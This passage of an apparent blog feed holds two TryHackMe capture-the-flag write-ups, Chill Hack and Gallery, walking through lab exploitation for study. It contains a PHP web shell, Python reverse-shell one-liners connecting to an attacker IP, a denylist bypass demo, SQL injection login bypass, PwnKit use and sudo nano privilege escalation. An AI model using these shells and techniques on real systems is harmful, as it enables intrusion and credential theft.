&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_chillhack/ls.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
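&lt;p&gt;Why the backslash gets past the filter, as an added Python example (not the room’s code; the denylist is a constructed stand-in for the unseen filter): the check runs on the raw request text, but a POSIX shell strips backslashes during word splitting, so the command it executes is not the text the filter inspected. The allowlist at the end is the fix a defender would apply: map fixed action names to fixed argv lists and never hand user text to a shell.&lt;/p&gt;

```python
import shlex

# Constructed denylist standing in for the room's unseen filter: the request is
# rejected when its raw text contains one of these command names.
DENYLIST = ("ls", "cat", "nc", "python", "bash", "sh")

# Hardened alternative (assumed design): fixed action names mapped to fixed argv lists.
ALLOWLIST = {
    "uptime": ["uptime"],
    "whoami": ["whoami"],
    "disk": ["df", "-h"],
}


def denylist_blocks(raw):
    """Naive filter: substring match against the raw request text."""
    return any(word in raw for word in DENYLIST)


def shell_argv(raw):
    """The words a POSIX shell would actually execute. Backslashes are consumed
    during word splitting, so the text 'l\\s' becomes the word 'ls'."""
    return shlex.split(raw)


def denylist_bypassed(raw):
    """True when the text passes the filter but the shell would run a denied command."""
    argv = shell_argv(raw)
    return (not denylist_blocks(raw)) and bool(argv) and argv[0] in DENYLIST


def allowlisted_argv(action):
    """Returns the argv list for a known action name, or None for anything else.
    The caller runs it with subprocess.run(argv) (shell=False), so no user-supplied
    text is ever parsed by a shell and there is nothing for quoting tricks to act on."""
    return ALLOWLIST.get(action)


if __name__ == "__main__":
    for raw in ("ls -la", "l\\s -la"):
        print(repr(raw), "blocked:", denylist_blocks(raw),
              "shell runs:", shell_argv(raw), "bypass:", denylist_bypassed(raw))
    print(allowlisted_argv("whoami"), allowlisted_argv("whoami; ls"))
```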

&lt;p&gt;Now we can spawn a reverse shell to get user; here’s mine:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;&amp;lt;your IP&amp;gt;&quot;,&amp;lt;your port&amp;gt;));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;bash&quot;)'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;root&quot;&gt;Root&lt;/h2&gt;
&lt;p&gt;After getting user I started looking for a way to get root, and I found something interesting in the OS version:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;www-data@ubuntu:/tmp$ uname -a
Linux ubuntu 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The box is vulnerable to CVE-2021-4034 (PwnKit, a bug in polkit’s pkexec rather than in the kernel itself), so I uploaded &lt;a href=&quot;https://github.com/ly4k/PwnKit&quot;&gt;PwnKit&lt;/a&gt; onto the server and ran it:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_chillhack/pwnkit.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It worked, we got root!
See you at the next post, keep hacking&lt;/p&gt;</content><author><name></name></author><summary type="html">Write-up for Chill hack TryHackMe CTF</summary></entry><entry><title type="html">Gallery - TryHackMe write-up</title><link href="http://0xshushu.github.io/blog/Gallery-THM/" rel="alternate" type="text/html" title="Gallery - TryHackMe write-up" /><published>2022-04-24T00:00:00+00:00</published><updated>2022-04-24T00:00:00+00:00</updated><id>http://0xshushu.github.io/blog/Gallery-THM</id><content type="html" xml:base="http://0xshushu.github.io/blog/Gallery-THM/">&lt;p&gt;Write-up for Gallery TryHackMe CTF&lt;/p&gt;

&lt;p&gt;Hi hackers, today I’m gonna write up Gallery, an easy TryHackMe CTF.&lt;/p&gt;

&lt;h2 id=&quot;user&quot;&gt;User&lt;/h2&gt;
&lt;p&gt;First I did some port scanning with rustscan and nmap (learn more about port scanning &lt;a href=&quot;https://book.hacktricks.xyz/pentesting/pentesting-network#scanning-hosts&quot;&gt;here&lt;/a&gt;):&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ rustscan -a gallery.thm -t 2000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at &quot;/home/ubuntu/.rustscan.toml&quot;
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.241.136:80
Open 10.10.241.136:8080
$ nmap -p80,8080 -A -oN port.txt -T4 gallery.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 16:44 CEST
Nmap scan report for gallery.thm (10.10.241.136)
Host is up (0.12s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Rustscan found two open ports, 80 and 8080; the Apache default page was hosted on port 80:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/apachedefault.png&quot; alt=&quot;apachedefault&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So, I enumerated directories with dirsearch:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ dirsearch -u http://gallery.thm -w $LIST/directory/dir.txt -o directory

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 329449

Output File: /home/ubuntu/ctf/tmp/80/directory

Error Log: /home/ubuntu/.local/lib/python3.9/site-packages/dirsearch/logs/errors-22-04-24_16-56-02.log

Target: http://gallery.thm/

[16:56:02] Starting: 
[16:56:42] 301 -  312B  - /gallery  -&amp;gt;  http://gallery.thm/gallery/
[16:57:21] 403 -  276B  - /server-status
[16:57:51] 200 -   11KB - /index.html

Task Completed
&amp;lt;dirsearch.dirsearch.Program object at 0x7f8e6d9c7700&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The gallery directory redirects to a login page:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/loginpage.png&quot; alt=&quot;loginpage.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I checked whether it was vulnerable to LDAP injection, SQL injection and XPath injection, and it was vulnerable to SQL injection:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/sqli.png&quot; alt=&quot;sqli.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And I gained access to the admin panel.
Then I started testing the admin panel functions and noticed one allowing an avatar image upload, so I tried uploading this web shell:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;lt;?php
	$cmd=$_GET[&quot;cmd&quot;];
	echo system(&quot;$cmd&quot;);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/schermata.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/directorylistabile.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/webshell.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It worked! 
Then I started a listener on my machine with nc:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ rlwrap nc -nlvp 4444
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;and I executed the following reverse shell on the web shell I uploaded:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.8.53.247&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;bash&quot;)'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;So I got a reverse shell.
Then I ran linpeas to look for something useful, and it found mike’s password:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/linpeas.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It worked and I got user.txt.&lt;/p&gt;

&lt;h2 id=&quot;getting-admin-hash&quot;&gt;Getting admin hash&lt;/h2&gt;
&lt;p&gt;We also need to find the admin hash, so I started looking for the database password in the web root and found a file called initialize.php containing it:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/sqlpwd.png&quot; alt=&quot;&quot; /&gt;
Then we can log into the database and dump the users’ hashes:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/hash.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We got it!&lt;/p&gt;

&lt;h2 id=&quot;root&quot;&gt;Root&lt;/h2&gt;
&lt;p&gt;Once we have user.txt our goal is root; running sudo -l I noticed we can execute /opt/rootkit.sh as root:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/sudo-l.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;/opt/rootkit.sh runs nano as root if we select the read option, and we can exploit that to spawn a root shell:
&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/nanoroot.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It worked, we got root!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://raw.githubusercontent.com/0xShushu/0xShushu.github.io/master/_posts/img_1/root.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;See you at the next post, keep hacking&lt;/p&gt;</content><author><name></name></author><summary type="html">Write-up for Gallery TryHackMe CTF</summary></entry></feed>